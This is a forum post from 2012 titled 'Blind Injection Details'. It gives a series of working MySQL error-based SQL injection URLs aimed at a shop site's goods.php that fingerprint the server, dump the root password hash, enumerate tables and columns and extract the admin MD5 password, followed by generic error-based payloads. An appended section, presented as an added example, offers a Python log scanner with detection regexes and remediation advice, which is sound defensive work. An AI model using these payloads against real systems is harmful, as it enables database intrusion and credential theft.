
Blind Injection Details

Original poster, posted on 2012-9-5 14:59:30
Determine the version number
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The user_name column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The password column in the current database
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin password (MD5)
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
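Every payload in this post relies on the same mechanism: a value the attacker wants to read is wrapped in `concat(<value>, floor(rand()*2))` and used as a GROUP BY key over a small derived table, which makes MySQL raise a duplicate-entry error whose message carries the concatenated value back to the page. That fixed shape is also what makes the technique easy to spot in web-server logs. The following Python script is an added detection example, not code from the original post: it parses constructed Combined Log Format lines, undoes repeated percent-encoding on every query-string parameter (so a double-encoded copy of the payload is still seen as the database would see it), and flags requests that carry the `floor(rand()*2) ... group by` signature together with supporting indicators such as `information_schema`/`mysql.user` access, `char(...)` string literals and a trailing comment. The IP addresses and timestamps are constructed; the three attack requests reuse payloads quoted in the post.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access log (Combined Log Format). Lines 2 and 4 reuse the
# @@version and root-hash payloads quoted in the post; line 3 is the user()
# payload percent-encoded a second time; the rest is benign traffic.
SAMPLE_LOG = r"""
203.0.113.10 - - [05/Sep/2012:14:59:30 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 5120
203.0.113.10 - - [05/Sep/2012:14:59:41 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 1033
203.0.113.10 - - [05/Sep/2012:15:00:02 +0800] "GET /goods.php?id=352&wsid=1%2520and%2520(1,1)%253E(select%2520count(*),concat((select%2520user()%2520),0x3a,floor(rand()*2))%2520x%2520from%2520(select%25201%2520union%2520select%25202)%2520a%2520group%2520by%2520x%2520limit%25201)%2523 HTTP/1.1" 500 1033
203.0.113.10 - - [05/Sep/2012:15:00:40 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 1033
198.51.100.7 - - [05/Sep/2012:15:01:15 +0800] "GET /search.php?keywords=information+about+rand+tables HTTP/1.1" 200 8801
198.51.100.7 - - [05/Sep/2012:15:01:20 +0800] "GET /article.php?id=7 HTTP/1.1" 200 2210
"""

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SIGNATURES = {
    # The duplicate-key trick itself: floor(rand()*2) or floor(rand(0)*2)
    # feeding a GROUP BY. This one is decisive; the rest are supporting.
    "rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S),
    # Enumeration of metadata or credential tables.
    "schema_enum": re.compile(
        r"(information_schema\s*\.\s*(tables|columns|schemata)|mysql\s*\.\s*user)", re.I),
    # char(114,111,...) used to build string literals without quote characters.
    "char_literal": re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)+\s*\)", re.I),
    # Comment that discards the remainder of the original statement.
    "comment_tail": re.compile(r"(#|--[\s-]|/\*).*$", re.S),
}


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so a double-encoded payload cannot hide."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def matched_signatures(value):
    """Return the set of signature names that fire on one decoded parameter value."""
    return {name for name, rx in SIGNATURES.items() if rx.search(value)}


def scan_log(log_text):
    """Return one finding per request parameter that carries the error-based payload."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl already decodes one layer; fully_decode handles the rest.
        for name, raw in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(raw)
            hits = matched_signatures(value)
            if "rand_groupby" in hits:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": int(m.group("status")),
                    "param": name,
                    "signatures": sorted(hits),
                    # What the database actually received, for the analyst.
                    "decoded": value,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['status']} param={f['param']} "
              f"signatures={','.join(f['signatures'])}")
        print("    " + f["decoded"])
```

The decisive indicator is `rand_groupby`; the others are attached so an analyst can see at a glance whether the request was fingerprinting the server or already reading `information_schema` or `mysql.user`. The 500 status on the flagged lines is a reminder of the precondition the whole technique depends on: the application echoes the raw database error to the client. Suppressing that output removes the leak channel, and passing `id` and `wsid` to the query as bound parameters instead of concatenated strings removes the injection itself.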